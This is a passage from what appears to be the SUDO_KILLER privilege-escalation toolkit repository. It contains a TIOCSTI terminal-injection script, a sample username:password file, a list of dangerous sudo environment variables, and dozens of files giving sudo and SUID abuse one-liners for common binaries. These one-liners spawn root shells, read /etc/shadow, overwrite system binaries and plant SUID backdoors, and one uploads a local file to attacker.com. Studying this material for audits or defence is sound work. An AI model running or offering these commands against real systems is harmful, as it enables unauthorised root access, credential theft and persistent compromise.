18 | PERL5DB 19 | PERL5LIB 20 | PERL5OPT 21 | PERLIO_DEBUG 22 | PERLLIB 23 | PS4 24 | PYTHONHOME 25 | PYTHONINSPECT 26 | PYTHONPATH 27 | PYTHONUSERBASE 28 | READNULLCMD 29 | RES_OPTIONS 30 | _RLD* 31 | RUBYLIB 32 | RUBYOPT 33 | SHELLOPTS 34 | TERMCAP 35 | TERMINFO 36 | TERMINFO_DIRS 37 | TERMPATH 38 | TMPPREFIX 39 | ZDOTDIR 40 | -------------------------------------------------------------------------------- /SK-Tools/SK-runas.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This script was developed to parse and search for specifc aliases by providing sudoers file 3 | # V1: Date Created : 08/12/2018 4 | # V2: Date Created : 11/02/2020 5 | # V3: Date Created : 20/07/2023 6 | # Date of last modification : 20/07/2023 7 | # @TH3xACE - BLAIS David 8 | # https://github.com/TH3xACE/SUDO_KILLER 9 | 10 | 11 | #!/bin/bash 12 | 13 | # Check if a username and command are provided as arguments 14 | if [ "$#" -lt 2 ]; then 15 | echo "Usage: $0 " 16 | exit 1 17 | fi 18 | 19 | # Get the username and command from command line arguments 20 | username="$1" 21 | shift 22 | command_to_run="$@" 23 | 24 | # Use 'su' to switch to the specified user and run the command via a pipe 25 | sudo su - "$username" </dev/null | sort -u | cut -d ":" -f 1 | grep -v "SK-search-sudoers.sh\|.sh\|.py\|.pl\|.c\|.perl\|.viminfo" | sort -u 20 | 21 | -------------------------------------------------------------------------------- /SK-Tools/ttyInject.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import fcntl 3 | import termios 4 | import os 5 | import sys 6 | import signal 7 | 8 | os.kill(os.getppid(), signal.SIGSTOP) 9 | 10 | for char in sys.argv[1] + '\n': 11 | fcntl.ioctl(0, termios.TIOCSTI, char) 12 | -------------------------------------------------------------------------------- /SK-Tools/userpwd.txt: -------------------------------------------------------------------------------- 1 | user:toor 2 | victim:victim 3 | john:nogood 4 | nathan:celib 5 | adriano:kajol 6 | -------------------------------------------------------------------------------- /SK-Tools/users.txt: -------------------------------------------------------------------------------- 1 | user1 2 | user2 3 | adriano 4 | john 5 | victim 6 | user 7 | tatiana 8 | nathan 9 | -------------------------------------------------------------------------------- /dbins/7z.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so 7 | -------------------------------------------------------------------------------- /dbins/Dangerous_env_var.txt: -------------------------------------------------------------------------------- 1 | *=()* 2 | BASH_ENV 3 | __BASH_FUNC< 4 | BASH_FUNC_ 5 | BASHOPTS 6 | CDPATH 7 | ENV 8 | FPATH 9 | GLOBIGNORE 10 | HOSTALIASES 11 | IFS 12 | JAVA_TOOL_OPTIONS 13 | LD_* 14 | LOCALDOMAIN 15 | NLSPATH 16 | NULLCMD 17 | PATH_LOCALE 18 | PERL5DB 19 | PERL5LIB 20 | PERL5OPT 21 | PERLIO_DEBUG 22 | PERLLIB 23 | PS4 24 | PYTHONHOME 25 | PYTHONINSPECT 26 | PYTHONPATH 27 | PYTHONUSERBASE 28 | READNULLCMD 29 | RES_OPTIONS 30 | _RLD* 31 | RUBYLIB 32 | RUBYOPT 33 | SHELLOPTS 34 | TERMCAP 35 | TERMINFO 36 | TERMINFO_DIRS 37 | TERMPATH 38 | TMPPREFIX 39 | ZDOTDIR 40 | -------------------------------------------------------------------------------- /dbins/aa-exec.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo aa-exec /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/ab.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Upload local file via HTTP POST request. 6 | URL=http://attacker.com/ 7 | LFILE=file_to_send 8 | sudo ab -p $LFILE $URL 9 | -------------------------------------------------------------------------------- /dbins/agetty.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/agetty.txt -------------------------------------------------------------------------------- /dbins/alpine.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo alpine -F "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/anansi_util.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo /home/anansi/bin/anansi_util manual /bin/bash 6 | -------------------------------------------------------------------------------- /dbins/ansible-playbook.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo '[{hosts: localhost, tasks: [shell: /bin/sh /dev/tty 2>/ 7 | dev/tty]}]' >$TF 8 | sudo ansible-playbook $TF 9 | -------------------------------------------------------------------------------- /dbins/ansible-test.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ansible-test shell 6 | -------------------------------------------------------------------------------- /dbins/aoss.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo aoss /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/apache2.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | It runs in privileged context and may be used to access the file system, 3 | escalate or maintain access with elevated privileges if enabled on sudo. 4 | * This will allow to read shadow file, retrieve root hash and perform a cracking 5 | sudo apache2 -f /etc/shadow 6 | -------------------------------------------------------------------------------- /dbins/apache2ctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo apache2ctl -c "Include $LFILE" -k stop 7 | -------------------------------------------------------------------------------- /dbins/apt-get.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo apt-get changelog apt 8 | !/bin/sh 9 | * For this to work the target package (e.g., sl) must not be installed. 10 | TF=$(mktemp) 11 | echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF 12 | sudo apt-get install -c $TF sl 13 | * When the shell exits the update command is actually executed. 14 | sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh 15 | -------------------------------------------------------------------------------- /dbins/apt.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo apt changelog apt 8 | !/bin/sh 9 | * For this to work the target package (e.g., sl) must not be installed. 10 | TF=$(mktemp) 11 | echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF 12 | sudo apt install -c $TF sl 13 | * When the shell exits the update command is actually executed. 14 | sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh 15 | -------------------------------------------------------------------------------- /dbins/ar.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -u) 6 | LFILE=file_to_read 7 | sudo ar r "$TF" "$LFILE" 8 | cat "$TF" 9 | -------------------------------------------------------------------------------- /dbins/arj.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The archive can also be prepared offline then uploaded. 6 | TF=$(mktemp -d) 7 | LFILE=file_to_write 8 | LDIR=where_to_write 9 | echo DATA >"$TF/$LFILE" 10 | arj a "$TF/a" "$TF/$LFILE" 11 | sudo arj e "$TF/a" $LDIR 12 | -------------------------------------------------------------------------------- /dbins/arp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo arp -v -f "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/as.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo as @$LFILE 7 | -------------------------------------------------------------------------------- /dbins/ascii-xfr.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ascii-xfr -ns "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/ascii85.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ascii85 "$LFILE" | ascii85 --decode 7 | -------------------------------------------------------------------------------- /dbins/ash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ash 6 | -------------------------------------------------------------------------------- /dbins/aspell.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo aspell -c "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/at.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null 6 | -------------------------------------------------------------------------------- /dbins/atobm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo atobm $LFILE 2>&1 | awk -F "'" '{printf "%s", $2}' 7 | -------------------------------------------------------------------------------- /dbins/awk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo awk 'BEGIN {system("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which awk) . 16 | 17 | ./awk 'BEGIN {system("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/aws.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo aws help 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/base32.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo base32 "$LFILE" | base32 --decode 7 | -------------------------------------------------------------------------------- /dbins/base58.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo base58 "$LFILE" | base58 --decode 7 | -------------------------------------------------------------------------------- /dbins/base64.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo base64 "$LFILE" | base64 --decode 7 | -------------------------------------------------------------------------------- /dbins/basenc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo basenc --base64 $LFILE | basenc -d --base64 7 | -------------------------------------------------------------------------------- /dbins/basez.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo basez "$LFILE" | basez --decode 7 | -------------------------------------------------------------------------------- /dbins/bash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo bash 6 | -------------------------------------------------------------------------------- /dbins/batcat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo batcat --paging always /etc/profile 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which batcat) . 17 | 18 | ./batcat --paging always /etc/profile 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/bc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo bc -s $LFILE 7 | quit 8 | -------------------------------------------------------------------------------- /dbins/bconsole.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo bconsole 6 | @exec /bin/sh 7 | -------------------------------------------------------------------------------- /dbins/bpftrace.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo bpftrace -e 'BEGIN {system("/bin/sh");exit()}' 6 | * TF=$(mktemp) 7 | echo 'BEGIN {system("/bin/sh");exit()}' >$TF 8 | sudo bpftrace $TF 9 | * sudo bpftrace -c /bin/sh -e 'END {exit()}' 10 | -------------------------------------------------------------------------------- /dbins/bridge.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo bridge -b "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/bundle.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo bundle help 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/bundler.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo bundler help 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/busctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo busctl --show-machine 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/busybox.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo busybox sh 6 | -------------------------------------------------------------------------------- /dbins/byebug.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo 'system("/bin/sh")' > $TF 7 | sudo byebug $TF 8 | continue 9 | ***** Limited SUID ***** 10 | If the binary has the SUID bit set, it may be abused to access the file system, 11 | escalate or maintain access with elevated privileges working as a SUID 12 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 13 | it only works on systems like Debian (<= Stretch) that allow the default sh 14 | shell to run with SUID privileges. 15 | This example creates a local SUID copy of the binary and runs it to maintain 16 | elevated privileges. To interact with an existing SUID binary skip the first 17 | command and run the program using its original path. 18 | * sudo install -m =xs $(which byebug) . 19 | 20 | TF=$(mktemp) 21 | echo 'system("/bin/sh")' > $TF 22 | ./byebug $TF 23 | continue 24 | -------------------------------------------------------------------------------- /dbins/bzip2.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo bzip2 -c $LFILE | bzip2 -d 7 | -------------------------------------------------------------------------------- /dbins/c89.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo c89 -wrapper /bin/sh,-s . 6 | -------------------------------------------------------------------------------- /dbins/c99.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo c99 -wrapper /bin/sh,-s . 6 | -------------------------------------------------------------------------------- /dbins/cabal.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo cabal exec -- /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/cancel.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/cancel.txt -------------------------------------------------------------------------------- /dbins/capsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo capsh -- 6 | -------------------------------------------------------------------------------- /dbins/cat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo cat "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/cdist.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo cdist shell -s /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/certbot.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | sudo certbot certonly -n -d x --standalone --dry-run --agree-tos --email 7 | x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 8 | 2>&0' 9 | -------------------------------------------------------------------------------- /dbins/check_by_ssh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The shell will only last 10 seconds. 6 | sudo check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" - 7 | H localhost -C xx 8 | -------------------------------------------------------------------------------- /dbins/check_cups.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo check_cups --extra-opts=@$LFILE 7 | -------------------------------------------------------------------------------- /dbins/check_log.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | INPUT=input_file 7 | sudo check_log -F $INPUT -O $LFILE 8 | -------------------------------------------------------------------------------- /dbins/check_memory.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo check_memory --extra-opts=@$LFILE 7 | -------------------------------------------------------------------------------- /dbins/check_raid.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo check_raid --extra-opts=@$LFILE 7 | -------------------------------------------------------------------------------- /dbins/check_ssl_cert.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The host example.net must return a certificate via TLS 6 | COMMAND=id 7 | OUTPUT=output_file 8 | TF=$(mktemp) 9 | echo "$COMMAND | tee $OUTPUT" > $TF 10 | chmod +x $TF 11 | umask 022 12 | check_ssl_cert --curl-bin $TF -H example.net 13 | cat $OUTPUT 14 | -------------------------------------------------------------------------------- /dbins/check_statusfile.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo check_statusfile $LFILE 7 | -------------------------------------------------------------------------------- /dbins/chmod.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_change 6 | sudo chmod 6777 $LFILE 7 | -------------------------------------------------------------------------------- /dbins/choom.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo choom -n 0 /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/chown.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_change 6 | sudo chown $(id -un):$(id -gn) $LFILE 7 | -------------------------------------------------------------------------------- /dbins/chroot.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo chroot / 6 | -------------------------------------------------------------------------------- /dbins/clamscan.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | TF=$(mktemp -d) 7 | touch $TF/empty.yara 8 | sudo clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No 9 | such file or directory$/\1/p' 10 | -------------------------------------------------------------------------------- /dbins/cmp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo cmp $LFILE /dev/zero -b -l 7 | -------------------------------------------------------------------------------- /dbins/cobc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x 7 | sudo cobc -xFj --frelax-syntax-checks $TF/x 8 | -------------------------------------------------------------------------------- /dbins/column.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo column $LFILE 7 | -------------------------------------------------------------------------------- /dbins/comm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo comm $LFILE /dev/null 2>/dev/null 7 | -------------------------------------------------------------------------------- /dbins/cowsay.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo 'exec "/bin/sh";' >$TF 7 | sudo cowsay -f $TF x 8 | -------------------------------------------------------------------------------- /dbins/cowthink.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo 'exec "/bin/sh";' >$TF 7 | sudo cowthink -f $TF x 8 | -------------------------------------------------------------------------------- /dbins/cp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | echo "DATA" | sudo cp /dev/stdin "$LFILE" 7 | * This can be used to copy and then read or write files from a restricted 8 | file systems or with elevated privileges. (The GNU version of cp has the 9 | --parents option that can be used to also create the directory hierarchy 10 | specified in the source path, to the destination folder.) 11 | LFILE=file_to_write 12 | TF=$(mktemp) 13 | echo "DATA" > $TF 14 | sudo cp $TF $LFILE 15 | * This overrides cp itself with a shell (or any other executable) that is 16 | to be executed as root, useful in case a sudo rule allows to only run cp 17 | by path. Warning, this is a destructive action. 18 | sudo cp /bin/sh /bin/cp 19 | sudo cp 20 | -------------------------------------------------------------------------------- /dbins/cpan.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo cpan 6 | ! exec '/bin/bash' 7 | -------------------------------------------------------------------------------- /dbins/cpio.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * echo '/bin/sh /dev/tty' >localhost 6 | sudo cpio -o --rsh-command /bin/sh -F 